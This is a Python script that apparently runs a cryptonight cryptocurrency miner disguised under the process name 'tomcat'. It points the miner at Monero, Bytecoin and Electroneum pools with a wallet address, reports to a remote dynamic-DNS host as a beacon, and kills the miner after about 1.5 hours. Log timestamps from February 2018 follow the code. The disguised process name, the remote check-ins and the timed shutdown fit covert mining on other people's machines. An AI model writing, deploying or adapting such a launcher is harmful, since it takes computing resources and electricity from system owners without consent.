import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:25:01.572803
#2018-02-17 16:11:01.744640
#2018-02-17 17:58:01.497148
#2018-02-17 19:45:04.286698
#2018-02-17 21:33:04.310030
#2018-02-17 23:17:03.537776
#2018-02-18 01:04:03.775910
#2018-02-18 02:51:06.948735
#2018-02-18 04:41:06.150164
#2018-02-18 06:33:04.134194
#2018-02-18 08:21:07.007133
#2018-02-18 10:09:04.814403
#2018-02-18 11:55:06.604579
#2018-02-18 13:40:01.525232
#2018-02-18 15:31:04.001947
#2018-02-18 17:19:03.203847
#2018-02-18 19:08:04.980331
#2018-02-18 20:53:06.475039
#2018-02-18 22:40:04.572888
#2018-02-19 00:29:06.909964
#2018-02-19 02:14:04.907451
#2018-02-19 04:02:06.221129
#2018-02-19 05:46:06.637843
#2018-02-19 07:36:05.386297
#2018-02-19 09:25:06.093527
#2018-02-19 11:14:04.378283
#2018-02-19 13:02:05.982309
#2018-02-19 14:51:06.156276
#2018-02-19 16:39:05.062359
#2018-02-19 18:26:08.742119
#2018-02-19 20:11:01.882952
#2018-02-19 22:02:02.035049
#2018-02-19 23:49:10.570530
#2018-02-20 01:35:08.550829
#2018-02-20 03:23:07.353717
#2018-02-20 05:10:08.436917
#2018-02-20 06:53:04.137624
#2018-02-20 08:40:01.391135
#2018-02-20 10:24:01.506368
#2018-02-20 12:08:07.940866
#2018-02-20 13:57:05.386367
#2018-02-20 15:41:01.988920
#2018-02-20 17:26:05.370864
#2018-02-20 19:15:11.938277
#2018-02-20 21:03:01.611070
#2018-02-20 22:47:04.153158
#2018-02-21 00:28:07.200691
#2018-02-21 02:14:05.826679
#2018-02-21 04:02:05.755642
#2018-02-21 05:49:03.833748
#2018-02-21 07:36:01.422391
#2018-02-21 09:20:08.463039
#2018-02-21 11:08:08.195779
#2018-02-21 12:56:06.181707
#2018-02-21 14:43:11.628303
#2018-02-21 16:32:06.661043
#2018-02-21 18:21:05.200518
#2018-02-21 20:06:07.429419
#2018-02-21 21:53:09.142297
#2018-02-21 23:41:05.709744
#2018-02-22 01:29:03.748945
#2018-02-22 03:17:08.121930
#2018-02-22 05:04:05.750432
#2018-02-22 06:47:05.285840
#2018-02-22 08:35:09.064258
#2018-02-22 10:22:05.309688
#2018-02-22 12:07:09.539231
#2018-02-22 13:52:07.730261
#2018-02-22 15:41:09.697958
#2018-02-22 17:28:07.656979
#2018-02-22 19:17:01.272477
#2018-02-22 21:08:03.914009
#2018-02-22 22:53:05.118617
#2018-02-23 00:40:01.968701
#2018-02-23 02:26:06.397180
#2018-02-23 04:15:01.393392
#2018-02-23 05:59:03.693101
#2018-02-23 07:31:08.348544
#2018-02-23 09:35:09.927398
#2018-02-23 11:18:02.193052
#2018-02-23 12:37:08.336830
#2018-02-23 14:05:10.442580
#2018-02-23 15:40:02.012706
#2018-02-23 17:10:01.328257
#2018-02-23 18:34:05.964157
#2018-02-23 20:15:07.416866
#2018-02-23 21:48:04.337872
#2018-02-23 23:24:05.516644
#2018-02-24 00:54:01.830012
#2018-02-24 02:34:03.662164
#2018-02-24 04:17:04.425551
#2018-02-24 05:46:06.601953
#2018-02-24 07:20:09.517911
#2018-02-24 08:54:07.416730
#2018-02-24 10:24:07.532755
#2018-02-24 12:08:07.356931
#2018-02-24 13:38:01.257283
#2018-02-24 15:10:06.321642
#2018-02-24 16:43:04.900163
#2018-02-24 18:18:01.741404
#2018-02-24 19:47:01.386656
#2018-02-24 21:20:06.364967
#2018-02-24 23:38:07.491514
#2018-02-25 01:45:08.259119
#2018-02-25 05:18:05.961740
#2018-02-25 11:25:01.412822